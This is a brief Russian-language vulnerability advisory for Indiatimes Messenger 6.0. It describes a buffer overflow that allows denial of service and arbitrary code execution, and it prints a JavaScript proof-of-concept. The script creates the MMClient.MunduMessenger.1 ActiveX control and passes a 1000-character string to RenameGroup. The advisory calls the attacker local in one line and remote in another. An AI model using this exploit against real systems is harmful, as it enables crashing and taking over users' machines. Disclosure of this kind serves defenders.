Программа: Indiatimes Messenger 6.0 

Уязвимость позволяет локальному пользователю вызвать отказ в обслуживании приложения и выполнить произвольный код на целевой системе.
Злоумышленник может создать специально сформированный сценарий и аварийно завершить работу приложения.
Удаленный пользователь может перезаписать ECX и EDI регистры и выполнить произвольный код на целевой системе с привилегиями пользователя, запустившего приложение. 

Эксплоит: 

[script]
var obj1 = new
ActiveXObject(«MMClient.MunduMessenger.1»);
var buf = «»; 

for(i=0; i<1000; i++)
{
buf += «A»;
}
while(obj1.GetServerStatus() != «Logged In»); //wait till login
obj1.RenameGroup(«Friends», buf, 5);
[/script]



Оставить мнение